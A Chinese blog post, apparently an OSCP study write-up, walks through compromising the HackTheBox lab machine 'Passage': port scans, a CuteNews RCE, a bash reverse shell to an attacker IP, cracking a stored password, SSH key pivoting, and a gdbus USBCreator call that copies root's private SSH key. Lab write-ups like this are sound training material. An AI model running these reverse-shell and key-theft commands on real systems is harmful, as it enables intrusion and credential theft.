OSCP备考_0x32_HackThBox靶机_Passage

Ethan医生7个月前靶场224

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)


image.png


nmap -sU --top-ports 100 10.129.221.74  (扫描UDP)



直接看到底下,然后在浏览80页面,发现一个域名passage.htb

image.png

cutephp查看有没有可利用的漏洞

image.png

可以先尝试看看rce


就是用来反弹shell

/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.38/3333 0>&1'

image.png

image.png


/var/www/html/CuteNews/cdata/users

image.png

上面的挡案都类似base64加密,最后在b0.php内发现密码

image.png

然后将密码取出,放在crackstation进行破解

atlanta1

然后我们去到paul的家目录下,我们通过查看ssh 发现具有密钥

image.png

image.png

image.png

发现私钥是nadav

image.png

我们查看.viminfo

发现有usb我记得这个是由本地提权的漏洞的

使用dbus偷窃

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/root_keys true

image.png

image.png



标签: OSCP

相关文章

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

OSCP备考_0x17_HackThBox靶机_Linux_Mirai

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.122.40 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举)   ...

OSCP备考_0x15_Vulnhub靶机_DerpNStink: 1

OSCP备考_0x15_Vulnhub靶机_DerpNStink: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/derpnstink-1,221/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192...

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.1...

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。